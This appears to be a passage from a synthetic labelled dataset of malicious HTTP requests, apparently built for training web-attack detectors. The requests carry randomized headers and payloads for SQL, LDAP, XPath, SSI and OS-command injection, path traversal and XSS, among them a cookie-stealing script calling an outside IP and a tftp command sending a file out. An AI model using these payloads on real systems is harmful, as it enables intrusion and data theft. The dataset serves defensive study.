Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: gzip
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

8ialalb63qs=select  r2yo  from   ALL_USERS&nl=ot&edZantierdeleteE+&4e3EaQafti=767893342&nadea=28294264&es8tllO=i5tiobjectEaconrhi;?&eaTcC3Mr=st&idqeT07lb0wd=motauenirtit8e6&ejyGerU=-ptNr1n&hese6eeoelgf=hsapehinsertls&oodyirnyH=oT&Xo0WiPk3G=xe6oAfaosvosecaOna

End - Id: 41525
Start - Id: 49632
class: XPathInjection
GET /dhI/BQ/s5eeea.shtml?5atirFdcRoc=949242&Aa8mouooeleten=VFx%27++or++6++%3C+++++count%28path%2Fchild%3A%3A*%29+++or+%27fs%27++++%3D++++%27 HTTP/1.0
Host: www.6ohcNm.net:40
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: us-ascii;q=0.8
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: max-stale=25
Client-ip: 77.18.73.164
Cookie: eaahSiegni= eLbe8
Cookie2: $Version="34"
Date: Mon, 17 May 04 03:29:59 GMT
ETag: "oaaS6UjlvBpJfRDrhU"
Expect: 100-continue
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Fri, 13 Apr 07 14:00:27 UTC
If-Unmodified-Since: Wed, 09 Apr 08 09:03:27 CET
If-Match: *
If-None-Match: "9I-KN992UTWIsHB0t"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.0
Pragma: atanb='pon'
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: NTLM aWNzdTJlenVtc2FmZHVwcmhpMG90ZWF0M3I1cm9lZXI=
Range: 31-025167,936-84
Referer: http://www.leb7Zo.net/lzm6rd/n9euWsqa.mdb
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.8 (Windows; U; Win 9x 3.6; t7-lh; rv:8.7.3) Gecko/28606298
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 0.5 www.5eyek73.jpg
Transfer-Encoding: deflate
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 903451462
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49632
Start - Id: 38348
class: LdapInjection
GET /Rz8ahs/ss0LgK6mJE32_JQwX8/1locationuHP6DJu/e6E8.kVqWkjI3Ev/kpj4XVt_3A09FTkdfkf/c1dxcYzqOCUes64HJ.js?msfrc73RotNbae=eorer%29lilmochat&rAnhtnehte3he=%29+++%28+%7C++%28++++cn%3D*o++%27brien*++%29%28mail+++%3D*o++++%27brien*+++%29+++&phrnebe4h6ihmt=nhavingO&Fseeakfgahim=aRhlMkKA&terhln6hn=a%3DpCi&Emailhaving5r2GaV9iV=e_wFiH-i&ttrjesits=592493 HTTP/1.1
Host: www.yo8rahedet.ch
Connection: ciaa
Accept: text/plain, image/*
Accept-Charset: iso-8859-8, windows-1254;q=0.7, windows-1253;q=0.2, windows-1257;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 126.43.137.208
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="2"
Date: Tue, 31 Oct 06 21:15:51 CET
ETag: "eg_Owd@DHvhvOHK"
Expect: 100-continue
From: vuerr@nGeav.fr
If-Modified-Since: Fri, 13 Aug 04 09:31:29 GMT
If-Unmodified-Since: Thu, 10 May 07 13:21:02 GMT
If-Match: *
If-None-Match: "JLvvXg31@D1chy3u_y"
If-Range: Fri, 24 Jul 09 14:50:41 UTC
Max-Forwards: 9
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM ZWVob0VsaHJlQ3JydGVhdW9hbXJpZWlzdHR1OWVzZWFvaW9jZWVlcmNlZmRvbm4=
Range: 0-190754,-136
Referer: /ogmlce/jgabrbe.avi
TE: trailers
Trailer: Accept-Encoding
User-Agent: wTuG/7.8.2
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 896x746
Via: 3.1 144.79.201.13, uim/1.5 www.essxe2ee.gif:270, 8.5 31.0.116.14
Transfer-Encoding: identity
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38348
Start - Id: 43019
class: OsCommanding
POST /bi/c1/oiPZqbDlSRlvN.siF1Cf/5T6/cBwindow.openSwKRObeRKaYU/ae4cictev.msf? HTTP/1.1
Content-Length: 114
Content-Language: cn
Content-Encoding: deflate
Content-Location: http://hbDnNf9l.ch/irfpot/hDrom/kgrrdk5.pdf
Content-MD5: dW9lcjdlZW9zdXNBbGN1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 06:40:20 GMT
Last-Modified: Thu, 30 Mar 06 20:04:01 UTC
Host: 174.96.176.240
Connection: cxdttt
Accept: audio/basic, application/x-tar;q=0.2, application/zip;q=0.5
Accept-Charset: utf-8;q=0.8, x-mac-chinesetrad, iso-8859-2;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 93.74.84.6
Cookie: grYXftpyFdeleteJ_=39736
Cookie2: $Version="6"
Date: Mon, 17 Nov 08 13:06:40 CET
ETag: W/"hMsFsdYlB3akCURvS"
Expect: hnujl5=enoyt;3ssa
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 01 Jun 05 12:23:03 CET
If-Unmodified-Since: Mon, 24 Apr 06 19:14:14 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 00
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Digest realm
Range: 171-10,013-0,-6
Referer: /im0ogmIu/y9nwpa/diud/ssoursai.asp
TE: gzip;q=0.5,deflate
Trailer: Pragma
User-Agent: ht4Inpca/2.8.4.9
UA-Color: color32
UA-Pixels: 2695x320
Via: 0.3 www.5hN0l.shtml:9, HTTP/8.5 168.223.20.107, 3.1 www.ohwoubri.gif
Transfer-Encoding: eskz; 7Zzp=eWjaRe2
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

trsteLlnysh3=i9H0fPsMimnsh&tUsinisanxin=6uiln2prtiihtlfjwu&Uetadpo0dhF0o4=00650&kq5feEt=ls   -las    /home/|

End - Id: 43019
Start - Id: 47940
class: XSS
GET /9vhr5nStctswsnsrekp/dsEnhi/iW/syhiVBdenedNnrt/slvgFzqO3JK3yL53H6/dgSnfJyHfjtFvrCg/vxR.4Z0./hUFuyvWGsBvcweqy0G/onesy.asp?tFposition4p=mnphphA&otehokteatnmhvn=orEnt%27Sw%5Belhssmr%3B%3Al&tlgla2ialtmbheK=dstdinepoi+ouhome1&pA2WKGcHj=%3Cobject+classid%3D++++%22+clsid%3A...+++++%22+++++codebase+++%3D++++%22++++javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F117.217.194.140%2Fer.bin%27%2Bdocument.cookie%29%3B%5D%22++++%3E HTTP/1.0
Host: 12.215.138.232:80
Connection: close
Accept: application/rtf, application/postscript;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 233.205.30.192
Cookie: RHLb3KVps@=i4jmw.@c;pmsasHrrylkr=676;CNGebHq=xea0g;7euaiapciptAa=4514018;hz3=Q ahe7;rlcme4eheo=sXa
Cookie2: $Version="16"
Date: Wed, 31 Jan 07 15:27:45 CET
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Thu, 08 Mar 07 24:43:13 CET
If-Unmodified-Since: Thu, 30 Nov 06 09:40:01 CET
If-Match: "_@TaipZZGQ5OuW1tZM"
If-None-Match: *
If-Range: Tue, 04 Mar 08 04:52:56 UTC
Max-Forwards: 89
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: NTLM Q2J0c25nczVSb2VMb3NvdHJkOHJpTkUzZWVwYXRlaUM5b3Nub3ZvdQ==
Range: 986919-,798-764614
Referer: http://ri0eO.net/mpelorE/gs4aedh/ofaayer/s1fxsn/itTes.swf
TE: gzip
Trailer: Max-Forwards
User-Agent: yeEe0md/5.3.6
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 929x206
Via: 6.7 164.158.135.135:0, phh/2.7 50.128.53.81, 1.7 www.gsdee.htm
Transfer-Encoding: gzip
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47940
Start - Id: 38544
class: LdapInjection
GET /eNHd4JOdbnwph1wb25/djtooaoIETsqolttzd3/edr9ein8sNaeR/nLmdjQsaAIKbnU8QJj.css?we6xqsce=i%28having&auo70=uxteosessystem%7Cbechop%5Ctsposition%3C&taletcegtjqeete=c&hnm=%29%28++%7C+++%28++cn%3D*o++++%27brien*++++%29%28mail++++%3D*o++%27brien*++%29++++&dErrner=35441 HTTP/1.0
Host: www.2stF.de
Connection: close
Accept: video/*;q=0.2, audio/x-wav;q=0.3, video/mpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: max-stale=22
Client-ip: 137.169.169.214
Cookie: ejswVolxh=seuNm3pOselect;wx8objects_=9 >%saob o
Cookie2: $Version="4"
Date: Fri, 17 Jun 05 11:13:59 CET
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: yyiraR
From: zttnih@4elXnnltkb.org
If-Modified-Since: Mon, 04 Oct 04 24:01:58 CET
If-Unmodified-Since: Fri, 09 Nov 07 09:51:35 CET
If-Match: "gXnPu43rRSl7y5JBI"
If-None-Match: *
If-Range: Fri, 08 Feb 08 02:27:49 GMT
Max-Forwards: 8305
MIME-Version: 2.4
Pragma: vemwp='et'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Basic RTU5ZXA3czM6ZXdEdnlnbW4=
Range: 447-,158917-
Referer: /dwenm.ace
TE: trailers,trailers
Trailer: If-Range
User-Agent: erbeesed (gj.FrsS; 1ODo@x; oAjWgJi4YW)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: 2.3 157.122.93.120
Transfer-Encoding: identity
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38544
Start - Id: 40321
class: SSI
GET /rglDitrdoieedkop5/De/9IstyleemailZ/nkqQsoXO.pl?epsTte2f0b=OsOeoyragsoqhs&hSO0=tl&nDe=65&V.3Gshutdown7cRa=%3C%21--%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cy7UDiist%5CneeNwds%5Creint3rt.exe++++d%3A%5Cabg%5Cwww.etrireet.org%5Ce4nnrslesI%5Cdatabase.mdb++%2Fx++++exporttofoxpro%22--%3E&igNjhy9=twusr&ia=126&rst35lt=49565 HTTP/1.1
Host: 92.119.224.67
Connection: eaobi
Accept: text/html;q=0.4, video/*;q=0.1
Accept-Charset: x-mac-korean, x-mac-chinesetrad, koi8-r, us-ascii, windows-1257;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 239.88.55.52
Cookie: tiu=750371;nsD6lwNeianah7l=eI7K07oO-;hnllomh=evy3;tyaflm5prdr=liio
Cookie2: $Version="373"
Date: Sat, 21 Oct 06 01:22:26 CET
ETag: W/"BreSvbANyEzg2vf5"
Expect: o7aef=it48hin
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Sun, 01 Jun 08 20:26:42 CET
If-Unmodified-Since: Mon, 25 Aug 08 18:34:32 CET
If-Match: "eb82OlqOVyIEXGn4kH"
If-None-Match: "lFpurYD-4izqy-e70u6P"
If-Range: *
Max-Forwards: 557
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: Basic dG9yVG95dTpyOXBpc2w=
Range: -2115,0045-233,-51
Referer: /sg9is4sr/8l20pp/heaxl.jpeg
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: 24etqjrte (fGtLGasfZ; lkxeo_mU)
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: hsMps/7.4 164.37.184.27
Transfer-Encoding: compress
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40321
Start - Id: 41271
class: SqlInjection
GET /ctlno5qehrBh/ef8C2Uukb/a9/30wWwXgunionJTY/pAxPiaCMG/i1gdBl18WfpfTFzMwZ/hnhVN/Ertcnsoeo/d3USmst6Ttsl/t3JWiH_9j84/wHm5nSautoexecUvQ.php3?itjNr=83&wnu=0qettn&aHmbbb0ttOttc=drf8ue&oisesjc=6nei%7Cnem%5BS&tt8sGieio=i%2BuioL+ieyvh5e&drOs=6044332&jysnHrxyh=4495&zl=taoR2%25selectir&50.ZT6WMC=icttidaiS7rl HTTP/1.1
Host: 51.68.119.163
Connection: keep-alive
Accept: text/xml;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.205.172.131
Cookie: 3group byGDEDudnodesq=6553855;vbpra6ttyoo=EA3eselecteechiigd;yyPscriptyt='  union     select  @@version,1,1,1--
Cookie2: $Version="40"
Date: Thu, 15 Dec 05 24:44:41 CET
ETag: W/"9OoU5EN4jT3cKEr2hXY"
Expect: oloekuar
From: eo7Ttna@e3k5cwi.biz
If-Modified-Since: Sat, 19 Feb 05 08:54:50 CET
If-Unmodified-Since: Mon, 04 Feb 08 09:21:38 CET
If-Match: "158n8jc5GFA.w85"
If-None-Match: "@66_4LzqHAFcSk5tusan"
If-Range: Wed, 28 Oct 09 15:55:17 CET
Max-Forwards: 0975
MIME-Version: 7.9
Pragma: yrdlis='dg8uhr'
Proxy-Authorization: Digest realm
Authorization: NTLM dWE2b2hhYWtpbGt3bGVyZWFuczFlMGh3ZU5wYmdodmVrYQ==
Range: -742167,1-,861732-0195
Referer: /css6eemd.htm
TE: trailers
Trailer: Warning
User-Agent: acuOmlumt (eQqDsQT; cKbNh7; 3n6iLMRKtS; dQyNPE)
UA-Disp: 189,7567,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8605x333
Via: 0.1 236.240.95.131:4045, HTTP/6.6 www.s8es.shtml, 8.4 www.rpxnra9r.htm
Transfer-Encoding: deflate
Upgrade: nstget/4.5, oth/2.2
Warning: 898 182.226.132.175:4 "domyntnlr2rg2s" "Wed, 18 Mar 09 18:27:27 CET"
X-Forwarded-For: 26.168.221.221
X-Serial-Number: 40502519825316618306
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41271
Start - Id: 42910
class: OsCommanding
PUT /sQZvr2/mA/oQ/t1/l4vQOivQd4ENM/8dimpINEtdtUoN/o5hJD@Y@/U1OBjHxmlJ.msf? HTTP/1.0
Content-Length: 250
Content-Language: Rdt,ritnosm
Content-Encoding: deflate
Content-Location: http://www.2Dcep.ch/akst.png
Content-MD5: ZXRZaHVqcGNmYWNlYWVocg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Sep 04 09:12:38 CET
Last-Modified: Wed, 31 Aug 05 11:43:43 UTC
Host: 169.233.199.198:80
Connection: rftnoof
Accept: */*
Accept-Charset: windows-1250, x-mac-roman
Accept-Encoding: gzip, gzip
Accept-Language: a-att;q=0.6, tdean-ft7uabhn
Cache-Control: no-transform
Cookie: K6mperlvEposition8k=euQg;ie=299222536;sqq=240.248.50.122 |   cmd.exe /s
Date: Sat, 06 May 06 19:47:30 GMT
ETag: W/"Pn6C@a1Uu-JpcYeWk2jD"
Expect: eedmsroa=te2x6;ciocoNem
If-Modified-Since: Sun, 03 Jun 07 21:06:21 GMT
If-Unmodified-Since: Sat, 19 Mar 05 13:06:47 CET
If-Match: *
If-None-Match: *
If-Range: "CMuivU-f4YaaMflRIA"
Max-Forwards: 71
Pragma: kj=qSs9c
Authorization: NTLM c3ZieGhoZ0FzY0h0aWN0aDBlbFN4ckliNmFoNGVsaUpCNnk4YWFvdVdoc2Ni
Referer: /inre.jpeg
TE: chunked
User-Agent: Mozilla/2.8 (compatible; ercnu; Mac OS X; bSot; p1ruao4mto; aDyhtidda)
UA-OS: Win98
UA-Pixels: 315x4693
Via: 4.2 www.tiQP.tiff
Transfer-Encoding: gzip
Warning: 468 22.180.227.236 "AasaHnehehogw59" "Thu, 27 Sep 07 14:30:58 CET"

iqmSc1s=slWwH7Jr.rI&ggsvdanzemepaf=lehhi4ygs1&yuh3wjhtdcN=&&aulFnroen=4581490420&iio7hniodSmyt=594222&ixieb8=i)jnio&guNI.M6cu8opt=uJC@dwG&8eir8Grtgmil1de=sna&zmthlL=257612&umhCWIh=fdiasotastyle&eilfmea5RieO7t=120849211&st=aleere6&eor6gc=0989168

End - Id: 42910
Start - Id: 45543
class: PathTransversal
GET /e7mtYinVk/d_r.5JZf6rT.sh/mxbspia7treheaarac/rMcJy-mdropT-shutdown/satEi/z-1RdLukRSd@Tzcb9K/nWy21cNX@dX/9jBFJ4XMGiKq.beI/iG3ShOkjx.php4?CN-NpYync=eum&eea6o3a4sa=4248&oecIc1=tt1rKtaov2Tspa&tCtmEiglhetone=24161782&Knswa3hHn0eHem=%5CWINDOWS%5Csystem.ini&adati=m+lb1include&hMff3sUqB=aY.&reccNaor3d=98633&hcetshniE=957 HTTP/1.1
Host: 190.15.100.76
Connection: e6ema1n
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 189.238.147.1
Cookie: ataa=aKIiephamtm9mc;ioif4etd9=oryf&e;7dpeeOs=nIebinule?eiqn;dWmihthghtd=aLc;access_logNGZ@-linkSQKD=]st6fl t9nO3As;edoQw1m8oe=iNmetai
Cookie2: $Version="65"
Date: Wed, 23 Dec 09 23:04:02 GMT
ETag: "_4i.sK62g09@pXchU"
Expect: 100-continue
From: tdntoueY@seoidlrr.fr
If-Modified-Since: Mon, 13 Mar 06 17:28:50 UTC
If-Unmodified-Since: Tue, 22 Mar 05 15:55:21 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Dec 04 20:49:55 GMT
Max-Forwards: 57
MIME-Version: 3.3
Pragma: i5H2n='hkcuc'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM dmFzZm1ua29vT3NjZW5mZHd0ZXJ0YWFzOERsdWlKZVR1Z2NuY3JrbzBy
Range: 903-3,3-4324,-8
Referer: http://www.sn8inti.ch/ibiqmh/nosmdda.pdf
TE: deflate;q=0.6,trailers,trailers
Trailer: Accept-Language
User-Agent: yT.7oL http://www.zbx7i.com
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/4.3 www.wnnwiisi.html, FTP/8.4 205.228.24.78:45
Transfer-Encoding: teute; 9Ben=itin
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45543
Start - Id: 40775
class: SSI
POST /bWJJ./etthhre/drToHt3.vWmVfCl8/uiShdYioErwolekc/aopsagr8bhitOo0h/bcGKzF/tEqn2UuYdY_rQ/v..d/jsi/aBZt_fNDi46jQkemYxeF.js? HTTP/1.0
Content-Length: 277
Content-Language: 0f3ojh,ltnH
Content-Encoding: gzip
Content-Location: http://dSads.st/Ett0NhE.txt
Content-MD5: MnVlcmZua29WaXRyZWdhYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jul 08 16:37:05 CET
Last-Modified: Sun, 17 Apr 05 14:30:09 CET
Host: 231.30.222.58
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=524
Cookie: 4eiitt4=801;Elkforma=66586033;aey8ir1aeubl8i=009627816;mu=58782;e0tdn=wp-oza|teyos Ep 0l
ETag: "_4SMIhw0@m0IpS4g"
If-Modified-Since: Thu, 01 Mar 07 08:47:18 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0566
Pragma: idbuaa=f
Proxy-Authorization: Digest opaque="decceeEe"
Authorization: Basic bWxuaXNnOnRlOXVsbG8=
Range: -02,-1581
Referer: http://doaaten5.org/nw5sM/floeg/ne8zteu/sR4e/e8pzYo.txt
User-Agent: orea2O/9.1
Transfer-Encoding: dAaw; ea9ki0=uwehuxj

iTbwerfat=749&si=205221&netcatMphpJ4I1=0234&enerss=<!--    #odbc    connect="cso2TN,eDans,5lm"     statement="select  *   from     kt"-->&yrTunyntoooHn=lfn3=y&dhofdmfelpvcl=17654&5ls@=f8dr&iaSl=8Av6umO_pCLL&pAeM=8&betweenc08kpchildhaving-=eekoboot.ini

End - Id: 40775
Start - Id: 49705
class: XPathInjection
GET /braPeqniiy-T.swf?esenpm=5169+or+++++1%3C+++++lpA%2FoB%2Fm%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D81%5D+or+++++2%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 77.152.226.43:584
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4
Accept-Language: wsdu-tb;q=0.8, otu-nTiEr, tdo-foK;q=0.2
Cache-Control: max-age=4
Client-ip: 250.131.219.97
Cookie: e5eoeZla=atzReAoEmQXD
Cookie2: $Version="72"
Date: Mon, 05 Jan 09 07:43:36 UTC
ETag: W/"s3klw_r.kke6tQh"
Expect: iaeoct=i0eao6Xh;aoccEe=barnyz
From: tmHtei@9Eaetn4.de
If-Modified-Since: Mon, 04 Jan 10 03:07:35 GMT
If-Unmodified-Since: Sun, 28 Nov 04 24:51:01 UTC
If-Match: *
If-None-Match: "M2o.KHXAyB@bXeNbgnSV"
If-Range: Mon, 19 Apr 10 02:57:42 GMT
Max-Forwards: 30
MIME-Version: 3.5
Pragma: 7='tAw'
Proxy-Authorization: NTLM ZG50ZWdyZGNnZ2hwYXJseXRtd2Zlc2JpYWVzeXJ3dmFuQmhwYTFhc29FZW8=
Authorization: NTLM d3lybWFsMWFsYmtpclRjeXNzQW1pOHBibG1lZ21tbDUxZ3I3dHQ=
Range: -5492,963-312971
Referer: /Lti7wtp.jsp
TE: trailers
Trailer: Expect
User-Agent: m@UW6B._ http://www.tstoGott.st
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6094x1402
Via: aqsel/8.4 www.ulQel.png, HTTP/8.7 176.64.112.146, 3.6 www.ejgs.shtml
Transfer-Encoding: Mhni
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 538 76.5.143.201 "toetlotsdoestrvfje" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 13247958
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49705
Start - Id: 37761
class: LdapInjection
GET /goVL6NnMti1HukQU/4tcetefSteeihAfcfa/tianmmegdfpfogee/t068gdARDNNc0r5yCR./omtlmahn7ah/xjhqtskycDeuegt/exvTfbsy169/e7yjJkFB3RDP.htm?1nmi=9228688&gXiz6D=gbzl&uua723tea=015885236&sPmfwyw=xj%29%28+%7C+++%28fcerw%3D*%29 HTTP/1.1
Host: www.krnu.cz
Connection: close
Accept: application/postscript
Accept-Charset: gb2312, euc-cn, x-mac-arabic, windows-1255;q=0.8, windows-1257
Accept-Encoding: identity;q=0.2
Accept-Language: rvpe-3erEizs;q=0.8, qfk-6Mrq;q=0.7
Cache-Control: min-fresh=852
Client-ip: 28.9.182.133
Cookie: dtn=17182;tr9r5pa4rbr=&Cd;hwDs=wt;ysl=hechildh;tiis69=dP5DIOxUV;48Lsysteminsert7Vqa=ofnust
Cookie2: $Version="51"
Date: Sun, 28 May 06 06:32:47 CET
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Sun, 17 Oct 04 08:27:48 GMT
If-Match: *
If-None-Match: "FlUyRH.svcx1-1Rbz"
If-Range: "O5skC-f6TlVQNwP."
Max-Forwards: 19
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic dHJvZWh2TjpwaGVydHNl
Authorization: Basic TmllbGFlbmM6SXdsa2Fjcw==
Range: 6-
Referer: http://www.woqihaot.cz/Rmwa3i/0aa9/biim/xken9/2xewxti.jpg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: dwNteRtt/5.7.8
UA-CPU: x86
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 4.7 237.96.107.82:2, 5.5 www.uhaCz.png, FTP/7.8 91.64.194.212:43
Transfer-Encoding: identity
Upgrade: si0/4.3, ewgHho/5.9, yibiRd/8.8, ahmafn/5.3
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 753563632869650663
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37761
Start - Id: 43545
class: OsCommanding
GET /iIlhSxnS8bNbKH/N3tnesOT4detoerr5ea/ogH/vcew3tzrtu/h0mOFXI-Z0KI8CrX/iDX6GsIYsuskkwzP/sdptnahaegsp/eJrlc-.cfm?menegiOhbahs=%27+%3Buftp++-g++%2Fhome%2Froinna%2Felatchmamees+++++152.28.11.120++%2Ficnsma++%3B HTTP/1.1
Host: 130.49.138.126:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.4
Accept-Encoding: gzip, gzip, identity, compress
Accept-Language: *
Cache-Control: max-stale=96878
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="17"
Date: Sun, 19 Jul 09 08:54:05 CET
ETag: W/"LAnz5Rj1v.GFfze"
Expect: 100-continue
From: nsaoonaw@rhao6t.cz
If-Modified-Since: Mon, 07 Jun 04 14:42:52 UTC
If-Unmodified-Since: Wed, 04 Apr 07 07:55:26 UTC
If-Match: *
If-None-Match: "r0dID3-BH7rp1H4"
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 34
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Digest algorithm=dceste
Range: 387259-2,9-
Referer: http://enaei.st/uCt9.pl
TE: trailers
Trailer: Expect
User-Agent: Mozilla/5.8 (compatible; MSIE 1.2; WinNT; eeNvi2cs; nhwmhe8s; Ssyotie)
UA-CPU: x86
UA-Disp: 230,276,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 559x227
Via: HTTP/2.3 www.tUwoq.tiff, ack/0.3 www.aacl.tiff
Transfer-Encoding: compress
Upgrade: tatTmi/7.0
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 166.207.32.118
X-Serial-Number: 431097380
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43545
Start - Id: 46716
class: XSS
